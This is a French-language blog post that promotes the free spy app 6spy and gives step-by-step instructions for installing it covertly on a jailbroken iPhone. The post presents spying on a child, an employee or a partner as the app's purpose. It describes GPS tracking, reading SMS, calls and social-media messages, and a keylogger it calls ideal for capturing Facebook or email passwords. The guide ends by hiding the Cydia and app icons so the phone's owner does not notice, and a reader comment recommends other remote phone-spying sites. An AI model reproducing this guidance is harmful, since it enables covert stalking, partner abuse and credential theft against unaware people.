iPhone & iPod Touch

6spy : logiciel espion gratuit pour téléphone portable

Partage(s)

Vous souhaitez espionner le téléphone portable ou la tablette de votre enfant, de votre employé ou même de votre compagnon gratuitement mais vous ne savez pas comment vous y prendre ? Alors suivez notre tutoriel grâce à 6spy ! Ce logiciel est compatible avec la plupart des téléphones et tablettes sous iOS 7 à iOS 9 (iPhone, iPad, iPod Touch) et Android 4/5. Localisation GPS, SMS, appels, frappes clavier, historique, réseaux sociaux, contacts, notes, tout peut être récupéré !

Logo-6spy

Fonctionnalités de 6spy

Localisation GPS

La première fonctionnalité de 6spy concerne la localisation GPS sur une carte. Comme son nom l’indique, elle vous permet de connaître facilement l’endroit où se trouve le téléphone portable de la personne sur laquelle est installée l’application. Quotidiennement, vous recevrez par mail les endroit visités (avec la latitude et la longitude), ainsi que l’heure de ces déplacements et l’adresse de ces lieux.

Espionnage des SMS et les messages

Avec l’application 6spy, vous allez pouvoir surveiller à distance les messages et SMS envoyés, reçus et supprimés du téléphone portable sur lequel elle est installée. En outre, elle vous permet de connaître le nom et le numéro de téléphone du destinataire, ainsi que l’heure de la conversation.

Espionnage des appels

Le logiciel espion gratuit 6spy propose d’accéder à l’historique complet des appels entrants, sortants ainsi que ceux supprimés d’un téléphone (noms des contacts et numéros enregistrés). Les appels anonymes, la date et la durée des appels sont également récupérés.

Espionner Téléphone

Récupération des frappes clavier (keylogger)

Avec la fonction keylogger, vous avez la possibilité de capturer toutes les frappes effectuées sur le clavier du téléphone portable ou de la tablette sur lequel/laquelle est installé l’outil 6spy. Idéal si vous souhaitez espionner les identifiants et mots de passe d’un compte Facebook ou encore d’un compte e-mail.

Visualisation de l’historique internet

Vous souhaitez savoir quels sont les sites web visités par votre enfant ou votre employé ? Espionnez secrètement l’historique internet d’un téléphone portable ou d’une tablette avec 6spy. Cette fonction vous propose de visualiser toutes les adresses internet (URLs) visitées (dates et heure comprises), même si elles ont été supprimées.

Espionnage des réseaux sociaux

Avec 6spy, espionnez les conversations sociales de Facebook, Snapchat, WhatsApp, Viber, Yahoo ou encore Wechat en capturant tous les messages envoyés, reçus et supprimés du téléphone, heure/date et destinataires compris.

Listing des contacts et notes

Enfin, 6spy permet d’accéder à la liste des contacts et aux notes enregistrées (et supprimées) dans le téléphone ou la tablette. Vous pourrez connaître les noms, numéros de téléphones, adresses, mails et tout autres informations de chaque contact.

Comment installer 6spy sur iOS ?

1) Avant toute chose, assurez-vous d’avoir jailbreaké votre iPhone, iPad ou iPod Touch. Si c’est le cas, vous devriez avoir l’application Cydia sur votre écran d’accueil. Ouvrez-là, puis sélectionnez l’onglet Sources. Appuyez sur Modifier, puis sur Ajouter. Entrez ensuite l’adresse http://iphone.6spy.com, puis choisissez sur Ajouter la source. Terminer l’ajout de la source avec le bouton Retour vers Cydia.

source-cydia-6spy

2) A présent, entrez dans la source http://iphone.6spy.com précédemment installée. Sélectionnez Tous les paquets, puis 6spy Software. Appuyez sur Installer puis sur Confirmer. Patientez quelques secondes pendant l’installation, et sélectionnez Relancer le Springboard.

3) Une fois votre iPhone, iPad ou iPod Touch redémarré, ouvrez la barre de recherche Spotlight en faisant glisser votre doigt de haut en bas sur l’écran de l’appareil, entrez la clé secrète 123456 et sélectionnez Rechercher. Appuyez sur Connexion, puis entrez votre adresse email et votre mot de passe (compte Yahoo ou Gmail).

connexion-6spy

4) Si l’appareil n’était pas jailbreaké avant l’installation de 6spy, sélectionnez Cacher l’icône Cydia pour la masquer sur l’écran de l’appareil en même temps que le logiciel 6spy. Appuyez sur Changer la clé secrète pour modifier celle d’origine (123456) par la vôtre. Enfin, sélectionnez Quitter pour cacher le logiciel 6spy dans l’appareil. Patientez entre 30 minutes et 1 heure avant de recevoir des données dans votre boîte mail !

Pour le tutoriel sous Android, rendez-vous sur cette page du site de 6spy. Si vous êtes satisfait du service proposé gratuitement, sachez que vous pouvez faire un don au développeur en vous rendant à cette adresse.

Avertissement : World Is Small n’approuve pas l’utilisation de 6spy à des fins autres que celles approuvées juridiquement et selon les lois en vigueur dans votre pays ou région de résidence. Si vous avez des questions concernant l’utilisation légale de 6spy, assurez-vous de consulter un avocat avant de l’installer.

Partage(s)
6spy : logiciel espion gratuit pour téléphone portable
3.48 (69.58%) 48 votes

📱 L'application World Is Small est disponible ! Télécharger WIS (gratuit) 📱

  • Merci je trouve l’application utile mais pour espionner un portable à
    distance j’utilise souvent ce site http://spypro.fr pour lire les SMS et
    les données sur les téléphones de mes enfants le site offre ce service
    gratuitement , et pour localiser l’emplacement j’utilise ce deuxième
    site gratuit http://localisertelephone.fr

Rechercher
Suivez-nous